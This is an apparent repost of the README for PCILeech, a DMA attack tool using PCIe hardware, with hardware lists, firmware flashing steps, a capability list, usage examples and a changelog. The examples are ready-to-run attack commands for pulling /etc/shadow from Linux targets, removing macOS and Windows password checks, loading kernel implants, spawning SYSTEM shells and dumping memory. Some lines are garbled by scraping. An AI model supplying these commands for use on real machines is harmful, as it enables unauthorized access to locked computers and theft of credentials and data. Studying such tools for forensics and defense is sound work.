Published on October 27th, 2016 📆 | 6065 Views ⚑
0PCILeech – Direct Memory Access (DMA) Attack Software
- USB3380-EVB mini-PCIe card.
- PP3380-AB PCIe card.
- PE3B - ExpressCard to mini-PCIe.
- PE3A - ExpressCard to PCIe.
- ADP - PCIe to mini-PCIe.
- Sonnet Echo ExpressCard Pro - Thunderbolt to ExpressCard.
cd /pathtofiles
make
- [ insert USB3380 hardware into computer ]
insmod pcileech_flash.ko
apt-get update && apt-get install gcc make linux-headers-$(uname -r)
and try again.rmmod pcileech_flash
. If there is an error flashing is unsuccessful. Please try again and check any debug error messages by issing the command: dmsg
.- Retrieve memory from the target system at >150MB/s.
- Write data to the target system memory.
- 4GB memory can be accessed in native DMA mode.
- ALL memory can be accessed if kernel module (KMD) is loaded.
- Execute kernel code on the target system.
- Spawn system shell [Windows].
- Spawn any executable [Windows].
- Load unsigned drivers [Windows].
- Pull files [Linux, FreeBSD, Windows, macOS].
- Push files [Linux, Windows, macOS].
- Patch / Unlock (remove password requirement) [Windows, macOS].
- Read and write errors on some older hardware. Try "pcileech.exe testmemreadwrite -min 0x1000" in order to test memory reads and writes against the physical address 0x1000 (or any other address) in order to confirm.
- Does not work if the OS uses the IOMMU/VT-d. This is the default on macOS (unless disabled in recovery mode). Windows 10 Enterprise with Virtuallization based security features enabled does not work fully - this is however not the default setting in Windows 10.
- Some Linux kernels does not work. Sometimes a required symbol is not exported in the kernel and PCILeech fails.
- Linux might also not work if some virtualization based features are enabled.
- Linux based on the 4.8 kernel does not work (Ubuntu 16.10).
- Windows Vista: some shellcode modules such as wx64_pscmd does not work.
- Windows 7: signatures are not published.
Examples:
Load macOS kernel module:
pcileech.exe kmdload -kmd macos
Remove macOS password requirement, requires that the KMD is loaded at an address. In this example 0x11abc000 is used.
pcileech.exe macos_unlock -kmd 0x11abc000 -0 1
Retrieve the file /etc/shadow from a Linux system without pre-loading a KMD.
pcileech.exe lx64_filepull -kmd LINUX_X64 -s /etc/shadow -out c:\temp\shadow
Show help for the lx64_filepull kernel implant.
pcileech.exe lx64_filepull -help
Load a kernel module into Windows Vista by using the default memory scan technique.
pcileech.exe kmdload -kmd winvistax64
Load a kernel module into Windows 10 by targeting the page table of the ntfs.sys driver signed on 2016-03-29.
pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt
Load a kernel module into Windows 10 (unstable/experimental). Compatible with VBS/VTL0 only if "Protection of Code Integrity" is not enabled.
pcileech.exe kmdload -kmd WIN10_X64
Spawn a system shell on the target system (system needs to be locked and kernel module must be loaded). In this example the kernel module is loaded at address: 0x7fffe000.
pcileech.exe wx64_pscmd -kmd 0x7fffe000
Show help for the dump command.
pcileech.exe dump -help
Dump all memory from the target system given that a kernel module is loaded at address: 0x7fffe000.
pcileech.exe dump -kmd 0x7fffe000
[adsense size='1']
Building:
The binaries are found in the pcileech_files folder. If one wish to build an own version it is possible to do so. Compile the pcileech and pcileech_gensig projects from within Visual Studio. Tested with Visual Studio 2015. To compile kernel- and shellcode, located in the pcileech_shellcode project, please look into the individual files for instructions. These files are usually compiled command line.
Changelog:
v1.0
- Initial release.
v1.1
- core: help for actions and kernel implants.
- core: search for signatures (do not patch).
- core: signature support for wildcard and relative offsets in addition to fixed offsets.
- implant: load unsigned drivers into Windows kernel [wx64_driverload_svc].
- signature: generic Windows 10 (Unstable/Experimental) [win10_x64].
- signature: Windows 10 updated.
- signature: Linux unlock added.
- other: firmware flash support without PLX SDK.
- other: various bug fixes.
v1.2
- core: FreeBSD support.
- implant: pull file from FreeBSD [fbsdx64_filepull]
- signature: Windows 10 updated.
- signature: macOS Sierra added.
- other: various bug fixes and stability improvements.
latest
- new implant: spawn cmd in user context [wx64_pscmd_user]
- implant: stability improvements for Win8+ [wx64_pscreate, wx64_pscmd, wx64_pscmd_user]
Gloss